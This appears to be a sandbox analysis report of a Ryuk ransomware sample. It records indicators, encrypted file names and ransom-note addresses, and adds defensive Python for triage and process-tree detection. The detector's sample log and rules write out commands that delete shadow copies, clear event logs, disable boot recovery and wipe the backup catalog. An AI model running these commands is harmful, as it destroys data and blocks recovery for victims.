Analysis

max time kernel: 147s
max time network: 34s
platform: windows7_x64
resource: win7-20230220-en
resource tags: arch:x64, arch:x86, image:win7-20230220-en, locale:en-us, os:windows7-x64, system
submitted: 11-03-2023 01:31

Static task: static1

Behavioral task: behavioral1
  Sample: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
  Resource: win7-20230220-en

Behavioral task: behavioral2
  Sample: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
  Resource: win10v2004-20230220-en
General

Target: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
Size: 885KB
MD5: 6a5bf25ff4f72ebca91280ffda057260
SHA1: 722063331acdbfc93ccbfacbec045800a835dd9e
SHA256: 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09
SHA512: 64d6f8fe84882bb5b835388461e2f662d58b8b69ca6314869e4e4bd29496f4ae2d2bda5afa82cbfc6a29d563368343da1b19431fc24ec5261618a424543bce42
SSDEEP: 12288:Qm+PiUwyM02Jl5YqWYgeWYg955/155/0QebUlAAsrsKCQoZRn6X:Q5iUtklagQKUKRrsKCQON6
Malware Config

Extracted from the ransom note C:\ProgramData\RyukReadMe.txt
  Contact addresses:
    Vulcanteam@CYBERFEAR.COM
    vulcanteam@inboxhub.net
Signatures

Ryuk
  Ransomware distributed via existing botnets, often Trickbot or Emotet.

Clears Windows event logs (1 TTP, 64 IoCs)
  Processes (pid process), every entry wevtutil.exe:
  632, 1428, 216, 764, 216, 1100, 980, 1700, 1748, 216, 1088, 1524, 852, 572, 608, 1280, 384, 1156, 608, 1328, 1428, 228, 1616, 1928, 1920, 1280, 212, 204, 2032, 1944, 772, 632, 220, 1484, 2016, 836, 1740, 1636, 1524, 1308, 796, 268, 1636, 1916, 1168, 1608, 1920, 1992, 1764, 1988, 1280, 952, 1132, 2044, 1200, 224, 1088, 608, 204, 2044, 980, 1168, 524, 212
  Several PIDs recur (216, 608 and 1280 each appear three times) and some are reused by other images later in this report (1280 for vssadmin.exe, 2012 for both bcdedit.exe and sc.exe), so Windows recycled PIDs during the run: correlate on image name and command line, not on PID. The list is also not exhaustive; the AdjustPrivilegeToken section records further wevtutil.exe PIDs (1496, 624, 1564, 860, 232) that do not appear here.
Deletes shadow copies (2 TTPs)
  Ransomware often targets backup files to inhibit system recovery.

Modifies boot configuration data using bcdedit (1 TTP, 2 IoCs)
  Processes (pid process): 2012 bcdedit.exe, 1348 bcdedit.exe

Untitled signature (heading not captured on the page)
  Processes (pid process): 1240 wbadmin.exe

Disables Task Manager via registry modification

Disables taskbar notifications via registry modification

Disables use of System Restore points (1 TTP)

Drops startup file (3 IoCs)
  Processes (description, ioc, process):
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe  attrib.exe
  File created                  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe  cmd.exe
  File opened for modification  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe  cmd.exe
Modifies file permissions (1 TTP, 1 IoC)

Enumerates connected drives (3 TTPs, 42 IoCs)
  Attempts to read the root path of hard drives other than the default C: drive.
  Processes (description, ioc, process); every entry is "File opened (read-only)", listed in the report's order:
  by 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe (24 opens):
    \??\N:  \??\A:  \??\K:  \??\O:  \??\P:  \??\R:  \??\S:  \??\X:  \??\E:  \??\L:  \??\V:  \??\Y:
    \??\J:  \??\M:  \??\Z:  \??\F:  \??\W:  \??\G:  \??\T:  \??\I:  \??\B:  \??\Q:  \??\U:  \??\H:
  by vssadmin.exe (18 opens):
    \??\F:  \??\G:  \??\D:  \??\E:  \??\E:  \??\e:  \??\F:  \??\g:  \??\H:  \??\H:  \??\D:  \??\f:
    \??\f:  \??\h:  \??\g:  \??\G:  \??\h:  \??\e:
  The sample itself opens every drive letter from A: to Z: except C: and D:; the vssadmin.exe opens are confined to D: through H:.
Drops file in Program Files directory (64 IoCs)
  Processes (description, ioc, process); every entry is "File opened for modification" by 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe:
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0196142.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD21315_.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\1033\MSACCESS.DEV_K_COL.HXK.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsImageTemplate.html.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_partstyle.css.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\VideoLAN\VLC\uninstall.log.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\Office.en-us\PSS10R.CHM.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jre7\lib\amd64\jvm.cfg.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\VideoLAN\VLC\locale\mai\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\VideoLAN\VLC\lua\intf\http.luac.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Icons\FDFFile_8.ico.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\WATERMAR\THMBNAIL.PNG.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382926.JPG.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STRTEDGE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.TLB.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\FORMS\1033\SIGNL.ICO.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.equinox.simpleconfigurator\bundles.info.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.common_3.6.200.v20130402-1505.jar.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\VideoLAN\VLC\locale\pl\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\GrayCheck\TAB_ON.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jre7\lib\management\snmp.acl.template.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00076_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt   (no .RYK suffix recorded)
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107308.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01161_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00670_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43F.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR30B.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\ProjectTool\Project Report Type\Fancy\PLUS.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\AUMProduct.aup.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107138.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152708.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jre7\lib\zi\Etc\GMT-9.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\button_right.gif.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01852_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-tools_zh_CN.jar.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152430.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGAD.DPV.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\AUTOSHAP\BD18230_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\1033\MSTINTL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\SUBMIT.JS.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiling.jar.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10265_.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\1033\OUTLBAR.INF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Common Files\Microsoft Shared\Filters\VISFILT.DLL.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0292248.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\PPSLAX.DLL.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ICE\PREVIEW.GIF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME42.CSS.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\GWE.ICO.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\QUERIES\MSN MoneyCentral Investor Stock Quotes.iqy.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Baku.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\Java\jre7\lib\zi\America\Miquelon.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\OFFREL.DLL.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif   (no .RYK suffix recorded)
  C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BS00443_.WMF.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\SpringGreen.css.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGMN089.XML.[Vulcanteam@CYBERFEAR.COM].RYK
  C:\Program Files\7-Zip\Lang\lv.txt.[Vulcanteam@CYBERFEAR.COM].RYK
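The file list above shows the naming convention the sample applies to encrypted files, <original name>.[<contact address>].RYK, where the bracketed address is the same one the sandbox extracted from RyukReadMe.txt in the Malware Config section; two files (DisplayLanguageNames.en_GB_EURO.txt and end_review.gif) are recorded without the suffix. The Python below is an added example, not sandbox output or the malware's code: it parses that convention, pulls contact addresses out of a note body, and buckets a file listing so a responder can scope an infection from a directory walk. The note text and the listing are constructed for the example; only the paths and addresses taken from this report are real.

```python
"""Parse the Ryuk-style artefacts recorded in this report: the encrypted-file
naming convention and the contact addresses in the ransom note.
Added example, not sandbox output."""
import re

NOTE_NAME = "RyukReadMe.txt"
CONTACT_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")
# <original name>.[<contact address>].RYK, as seen in the Program Files listing.
RYK_NAME_RE = re.compile(r"^(?P<original>.+)\.\[(?P<contact>[^\]]+)\]\.RYK$", re.I)

# Constructed stand-in for the note body: the report gives only the note's
# path and the two addresses extracted from it, not the full text.
SAMPLE_NOTE = """\
Constructed note body for the example.
Contact: Vulcanteam@CYBERFEAR.COM
Backup contact: vulcanteam@inboxhub.net
Quote Vulcanteam@CYBERFEAR.COM in the subject.
"""

# Constructed listing assembled from paths that appear in this report.
SAMPLE_LISTING = [
    r"C:\ProgramData\RyukReadMe.txt",
    r"C:\Windows\RyukReadMe.txt",
    r"C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0160590.WMF.[Vulcanteam@CYBERFEAR.COM].RYK",
    r"C:\Program Files\7-Zip\Lang\lv.txt.[Vulcanteam@CYBERFEAR.COM].RYK",
    r"C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt",
    r"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif",
    r"C:\Windows\hrmlog1",
]


def extract_contacts(note_text):
    """Addresses in order of first appearance, de-duplicated case-insensitively."""
    seen, out = set(), []
    for m in CONTACT_RE.finditer(note_text):
        key = m.group(0).lower()
        if key not in seen:
            seen.add(key)
            out.append(m.group(0))
    return out


def parse_encrypted_name(name):
    """Return (original name, contact address) for an encrypted file name, else None."""
    m = RYK_NAME_RE.match(name)
    return (m["original"], m["contact"]) if m else None


def triage_listing(paths):
    """Bucket a file listing into ransom notes, encrypted files and untouched
    files, and collect the contact addresses embedded in encrypted names."""
    result = {"notes": [], "encrypted": [], "untouched": [], "contacts": set()}
    for path in paths:
        name = path.rsplit("\\", 1)[-1]
        if name.lower() == NOTE_NAME.lower():
            result["notes"].append(path)
            continue
        parsed = parse_encrypted_name(name)
        if parsed:
            result["encrypted"].append(path)
            result["contacts"].add(parsed[1])
        else:
            result["untouched"].append(path)
    result["contacts"] = sorted(result["contacts"])
    return result


if __name__ == "__main__":
    print("note contacts:", extract_contacts(SAMPLE_NOTE))
    t = triage_listing(SAMPLE_LISTING)
    print(f"{len(t['notes'])} notes, {len(t['encrypted'])} encrypted, "
          f"{len(t['untouched'])} untouched; contacts {t['contacts']}")
```

Files the sample opened but did not rename land in the "untouched" bucket, which is exactly where a responder should look for partially processed or skipped files; the address parsed out of the suffix is a cheap cross-check against the note, since a mismatch would indicate a second actor or campaign.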
Drops file in Windows directory (5 IoCs)
  Processes (description, ioc, process):
  File created                  C:\Windows\RyukReadMe.txt                    0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
  File created                  C:\Windows\hrmlog1                           0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
  File opened for modification  C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl  wbadmin.exe
  File opened for modification  C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl  wbadmin.exe
  File opened for modification  C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl  wbadmin.exe

Launches sc.exe (4 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  Processes (pid process): 624 sc.exe, 2012 sc.exe, 1928 sc.exe, 1748 sc.exe
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Creates scheduled task(s) (1 TTP, 5 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution.
  Processes (pid process): 468 schtasks.exe, 668 schtasks.exe, 572 schtasks.exe, 1428 schtasks.exe, 928 schtasks.exe

Interacts with shadow copies (2 TTPs, 15 IoCs)
  Shadow copies are often targeted by ransomware to inhibit system recovery.
  Processes (pid process), every entry vssadmin.exe:
  1280, 288, 268, 1700, 572, 224, 1976, 1664, 2044, 1732, 272, 1988, 1524, 1088, 1100
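The recovery-inhibition and anti-forensics behaviours in this report (event-log clearing by wevtutil.exe, shadow copy and backup tampering by vssadmin.exe, wbadmin.exe and bcdedit.exe, scheduled-task creation through cmd.exe and schtasks.exe) are far more telling as a correlated cluster under one process tree than as individual hits, since each command also has legitimate administrative uses. The Python below is an added example, not part of the sandbox report: a small detector that reads process-creation records, walks parent PIDs back to the root of each tree, and flags a tree that combines several of these techniques. The key=value log format, the command lines, the parent PID 1500, the sample's on-disk path and the benign admin process (PIDs 3000 and 4000) are constructed; the report records process names and PIDs only, not arguments, so the command-line patterns are the well-known forms of each technique rather than anything the sandbox captured.

```python
"""Correlate process-creation records into the recovery-inhibition /
anti-forensics cluster seen in this report. Added example, not sandbox output."""
import re
from collections import defaultdict
from dataclasses import dataclass

# (rule, ATT&CK technique, image-name pattern, command-line pattern).
# The command-line patterns are assumptions: the report records process
# names and PIDs only, so these are the well-known forms of each technique.
RULES = [
    ("clear_event_log",        "T1070.001", r"wevtutil\.exe$", r"\b(cl|clear-log)\b"),
    ("delete_shadow_copies",   "T1490",     r"vssadmin\.exe$", r"\bdelete\s+shadows\b"),
    ("resize_shadow_storage",  "T1490",     r"vssadmin\.exe$", r"\bresize\s+shadowstorage\b"),
    ("wmic_shadowcopy_delete", "T1490",     r"wmic\.exe$",     r"\bshadowcopy\s+delete\b"),
    ("delete_backup_catalog",  "T1490",     r"wbadmin\.exe$",  r"\bdelete\s+(catalog|systemstatebackup)\b"),
    ("disable_recovery",       "T1490",     r"bcdedit\.exe$",  r"recoveryenabled\s+no\b|bootstatuspolicy\s+ignoreallfailures"),
    ("schtasks_persistence",   "T1053.005", r"schtasks\.exe$", r"/create\b"),
]


@dataclass
class Event:
    pid: int
    ppid: int
    image: str
    cmdline: str


# One record per line, key=value, as a constructed stand-in for Sysmon EID 1 /
# Security 4688 data. PIDs 1736, 920, 928, 632, 1428, 1280, 2012, 1348 and 1240
# come from the report; parent PID 1500, the sample's path, the task name and
# PIDs 3000/4000 (a benign admin running "vssadmin list shadows") are made up.
SAMPLE_LOG = r"""
pid=1736 ppid=1500 image=C:\Users\Admin\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe cmdline=0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe
pid=920 ppid=1736 image=C:\Windows\System32\cmd.exe cmdline=cmd.exe /c schtasks /create /tn example_task /tr C:\example\payload.exe /sc onlogon
pid=928 ppid=920 image=C:\Windows\System32\schtasks.exe cmdline=schtasks /create /tn example_task /tr C:\example\payload.exe /sc onlogon
pid=632 ppid=1736 image=C:\Windows\System32\wevtutil.exe cmdline=wevtutil.exe cl Security
pid=1428 ppid=1736 image=C:\Windows\System32\wevtutil.exe cmdline=wevtutil.exe cl System
pid=1280 ppid=1736 image=C:\Windows\System32\vssadmin.exe cmdline=vssadmin.exe Delete Shadows /all /quiet
pid=2012 ppid=1736 image=C:\Windows\System32\bcdedit.exe cmdline=bcdedit /set {default} recoveryenabled No
pid=1348 ppid=1736 image=C:\Windows\System32\bcdedit.exe cmdline=bcdedit /set {default} bootstatuspolicy ignoreallfailures
pid=1240 ppid=1736 image=C:\Windows\System32\wbadmin.exe cmdline=wbadmin delete catalog -quiet
pid=4000 ppid=3000 image=C:\Windows\System32\vssadmin.exe cmdline=vssadmin list shadows
"""

LINE_RE = re.compile(r"^pid=(\d+)\s+ppid=(\d+)\s+image=(\S+)\s+cmdline=(.*)$")


def parse_events(lines):
    """Parse key=value records into a pid -> Event map; malformed lines are skipped."""
    events = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            events[int(m[1])] = Event(int(m[1]), int(m[2]), m[3], m[4])
    return events


def root_of(pid, events):
    """Walk the parent chain to the highest ancestor present in the log."""
    seen = set()
    while pid in events and events[pid].ppid in events and pid not in seen:
        seen.add(pid)
        pid = events[pid].ppid
    return pid


def evaluate(lines):
    """Return {root pid: {rules, techniques, hits, image}} for trees with at least one hit.
    Only the process that actually runs the tool counts (cmd.exe carrying the
    same text on its command line does not), so a launch is never double-counted."""
    events = parse_events(lines)
    acc = defaultdict(lambda: {"rules": set(), "techniques": set(), "hits": 0})
    for ev in events.values():
        for rule, technique, image_re, cmd_re in RULES:
            if re.search(image_re, ev.image, re.I) and re.search(cmd_re, ev.cmdline, re.I):
                f = acc[root_of(ev.pid, events)]
                f["rules"].add(rule)
                f["techniques"].add(technique)
                f["hits"] += 1
    return {root: {"rules": sorted(f["rules"]), "techniques": sorted(f["techniques"]),
                   "hits": f["hits"], "image": events[root].image}
            for root, f in acc.items()}


def flag_roots(findings, min_rules=3):
    """Flag a tree that fires several distinct rules, or that pairs recovery
    inhibition (T1490) with event-log clearing (T1070.001)."""
    return sorted(root for root, f in findings.items()
                  if len(f["rules"]) >= min_rules
                  or {"T1490", "T1070.001"} <= set(f["techniques"]))


if __name__ == "__main__":
    findings = evaluate(SAMPLE_LOG.splitlines())
    for root in flag_roots(findings):
        f = findings[root]
        print(f"root pid {root} ({f['image']}): {f['hits']} hits, rules {f['rules']}")
```

Rooting the correlation at the top of the process tree is what makes the schtasks.exe launch (a grandchild via cmd.exe, as the WriteProcessMemory section shows) count against the sample rather than against a throwaway cmd.exe; the lone "vssadmin list shadows" from an unrelated parent never reaches the threshold, and a single "delete shadows" on its own would not either.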
Kills process with taskkill (5 IoCs)
  Processes (pid process): 872 taskkill.exe, 1696 taskkill.exe, 1328 taskkill.exe, 1916 taskkill.exe, 1772 taskkill.exe

Opens file in notepad (likely ransom note) (1 IoC)
  Processes (pid process): 864 NOTEPAD.EXE

Runs net.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
  Processes (pid process): 1736 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe, the same entry repeated for all 64 IoCs.
Suspicious use of AdjustPrivilegeToken (64 IoCs)
  Processes (description, pid, process), in the report's order:
  Token: SeDebugPrivilege  872 taskkill.exe
  Token: SeDebugPrivilege  1696 taskkill.exe
  1732 WMIC.exe, the following run of tokens enabled twice in full: SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35
  868 vssvc.exe: SeBackupPrivilege, SeRestorePrivilege, SeAuditPrivilege
  Token: SeDebugPrivilege  1328 taskkill.exe
  Token: SeDebugPrivilege  1916 taskkill.exe
  Token: SeDebugPrivilege  1772 taskkill.exe
  wevtutil.exe, SeSecurityPrivilege followed by SeBackupPrivilege for each of PIDs 1496, 624, 1564, 212, 1524, 204, 860, 232
  Notes: the three unnamed LUIDs 33, 34 and 35 are SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege (SE_INC_WORKING_SET_PRIVILEGE, SE_TIME_ZONE_PRIVILEGE and SE_CREATE_SYMBOLIC_LINK_PRIVILEGE in winnt.h). WMIC.exe enables its entire privilege set when it starts, so these entries establish that wmic ran under an administrative token, not what it was asked to do; the report does not record its command line. vssvc.exe is the Volume Shadow Copy service, which is what the vssadmin.exe calls drive. SeSecurityPrivilege plus SeBackupPrivilege is the pair wevtutil.exe needs to clear the Security log.
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 1736 wrote to memory of 920 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 920 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 920 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 920 wrote to memory of 928 | 920 | cmd.exe | schtasks.exe
PID 920 wrote to memory of 928 | 920 | cmd.exe | schtasks.exe
PID 920 wrote to memory of 928 | 920 | cmd.exe | schtasks.exe
PID 1736 wrote to memory of 876 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 876 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 876 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 836 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 836 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 836 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 268 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 268 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 268 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 268 wrote to memory of 468 | 268 | cmd.exe | schtasks.exe
PID 268 wrote to memory of 468 | 268 | cmd.exe | schtasks.exe
PID 268 wrote to memory of 468 | 268 | cmd.exe | schtasks.exe
PID 1736 wrote to memory of 1480 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1480 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1480 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1480 wrote to memory of 1912 | 1480 | cmd.exe | attrib.exe
PID 1480 wrote to memory of 1912 | 1480 | cmd.exe | attrib.exe
PID 1480 wrote to memory of 1912 | 1480 | cmd.exe | attrib.exe
PID 1736 wrote to memory of 524 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 524 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 524 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 524 wrote to memory of 668 | 524 | cmd.exe | schtasks.exe
PID 524 wrote to memory of 668 | 524 | cmd.exe | schtasks.exe
PID 524 wrote to memory of 668 | 524 | cmd.exe | schtasks.exe
PID 1736 wrote to memory of 1476 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1476 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1736 wrote to memory of 1476 | 1736 | 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.exe | cmd.exe
PID 1476 wrote to memory of 572 | 1476 | cmd.exe | schtasks.exe
